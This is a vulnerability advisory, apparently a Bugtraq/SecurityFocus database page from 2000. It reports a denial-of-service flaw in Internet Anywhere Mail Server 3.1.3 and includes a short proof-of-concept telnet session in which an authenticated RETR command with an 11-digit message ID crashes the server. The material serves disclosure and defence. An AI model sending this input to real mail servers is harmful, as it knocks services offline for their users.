Internet Anywhere Mail Server RETR DoS Vulnerability
BID:982
Info
Internet Anywhere Mail Server RETR DoS Vulnerability
| Bugtraq ID: | 982 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Feb 10 2000 12:00AM |
| Updated: | Feb 10 2000 12:00AM |
| Credit: | Posted on Bugtraq February 10, 2000 by Nobuo Miwa <[email protected]>. |
| Vulnerable: |
True North Software Internet Anywhere Mail Server 3.1.3 |
| Not Vulnerable: | |
Discussion
Internet Anywhere Mail Server RETR DoS Vulnerability
Submitting a RETR command with a message ID argument longer than 10 numeric characters will result in a crash of the Internet Anywhere Mail Server. A Doctor Watson error message will appear reporting an access violation by MailServer.exe. Restarting the mail server will resume functionality. This denial of service attack does not affect other running programs, and requires the attacker to have a valid username and password on the POP3 server.
Submitting a RETR command with a message ID argument longer than 10 numeric characters will result in a crash of the Internet Anywhere Mail Server. A Doctor Watson error message will appear reporting an access violation by MailServer.exe. Restarting the mail server will resume functionality. This denial of service attack does not affect other running programs, and requires the attacker to have a valid username and password on the POP3 server.
Exploit / POC
Internet Anywhere Mail Server RETR DoS Vulnerability
telnet target 110
+OK POP3 Welcome to someco.com using the Internet Anywhere Mail Server Version:3.1.3. Build: 1065 by True North Software, Inc. <[email protected]>
user username
+OK valid
pass password
+OK Authorized
RETR 11111111111
telnet target 110
+OK POP3 Welcome to someco.com using the Internet Anywhere Mail Server Version:3.1.3. Build: 1065 by True North Software, Inc. <[email protected]>
user username
+OK valid
pass password
+OK Authorized
RETR 11111111111
Solution / Fix
Internet Anywhere Mail Server RETR DoS Vulnerability
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
Internet Anywhere Mail Server RETR DoS Vulnerability
References:
References:
- Internet Anywhere Mail Server Product Webpage (True North Software)